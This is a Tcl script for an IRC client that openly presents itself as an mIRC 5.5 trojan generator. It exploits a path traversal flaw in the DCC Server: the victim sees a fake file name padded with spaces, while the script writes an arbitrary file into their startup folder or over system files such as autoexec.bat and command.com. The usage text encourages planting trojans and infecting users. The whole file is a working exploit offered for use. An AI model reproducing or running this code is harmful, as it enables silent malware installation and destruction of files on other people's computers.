#120 my_nick filesize fakefilename(74 spaces)\..\..\..\..\..\fullfakepathname
alias mirc5 {
    complete
    set tonick [lindex [args] 0]
    set port [lindex [args] 1]
    set denick [lindex [args] 2]
    set file [rep [lindex [args] 3] / \\]
    set fakefile [lindex [args] 4]
    set fakepath [string trim [join [lrange [args] 5 end]] \\/]
    if {$fakepath == ""} {
	echo "[kano] Usage: /[event] 4<nick or ip> 7<port> 8<yournick> 9<file to send> 11<what they think you're sending> 13<where to place on their system>"
	echo "[kano] Example: /[event]4 12.153.0.11 0759 8kano_owns_you 9kano11.zip 11hot.gif 13windows/start menu/programs/startup/kickass.zip"
	echo "[kano] What to overwrite? Try autoexec.bat, windows/start menu/programs/startup/file.ext (stick trojans in here), windows/command.com"
	echo "[kano] What this does: it connects to mirc 5.5's DCC Server port"
	echo "    and requests to send a file: <what they think the file is called>"
	echo "    but it actually sends a completely different filename: <where"
	echo "    to place on their system> which they can't see. It saves that"
	echo "    file on their hard drive and if you put it in their startup"
	echo "    dir it runs on startup."
	return
    }
    if ![file exists $file] {
	echo "[kano] $file does not exist"
	return
    }

    set host [uhost $tonick]
    if {$host == ""} {set host $tonick} {set host [lindex [split $host @] end]}
    if ![catch {socket $host $port} x] {
	fconfigure $x -translation binary -blocking no
	fileevent $x writable [list put_55 $x $tonick $denick $file $fakefile $fakepath]
	fileevent $x readable [list get_55 $x $tonick $file]
    } {
	echo [rep [rep [t socketfailed] %error $x] %type "mirc 5.5 trojan"]
    }
    complete
}

proc put_55 {sock to from file fakefile fake} {
    fileevent $sock writable ""
    echo "[kano] Sent mirc5 send request to $to"
    fconfigure $sock -buffering line
    puts $sock "120 $from [file size $file] [file tail $fakefile][format %74s ""][rep [file join ../../../../.. $fake] / \\]"
    fconfigure $sock -translation binary -blocking no
}

proc get_55 {sock to file} {
    if [eof $sock] {
	echo "[kano] $to closed mirc5 dcc connection"
	close $sock
	return
    }
    fconfigure $sock -buffering line
    gets $sock i
    fconfigure $sock -translation binary -blocking no
    set i [split $i]
    switch -- [lindex $i 0] {
	150 {
	    echo "[kano] $to has dcc sends via the dcc server unchecked, closing connection"
	    close $sock
	    return
	}
	151 {
	    echo "[kano] $to has rejected the dcc connection, closing"
	    close $sock
	    return
	}
	default {
	    if {[lindex $i 0] != "121"} {
		echo "[kano] continuing, but got unknown response from $to: [join $i]"
	    }
	    if {[lindex $i 2] != 0} {
		echo "[kano] $to wants to resume $file at [lindex $i 2] bytes, closing connection (try a different filename)"
		close $sock
		return
	    }
	    if {$to != [lindex $i 1]} {
		echo "[kano] $to says they're [lindex $i 1], but still continuing"
	    }
	    if [catch {open $file} x] {
		echo "[kano] error opening file $file to send $to, aborting"
		close $sock
		return
	    }
	    fconfigure $x -translation binary -blocking no
	    fileevent $sock readable ""
	    unsupported0 $x $sock
	    echo "[kano] Finished sending $file to $to, closing connection"
	    close $sock
	}
    }
}

kaddhelp mirc5 ";A mirc 5.5 trojan generator"
addname "mirc5.5trj v2"
addecho "[kano] type /mirc5 to infect some mirc 5.5'ers"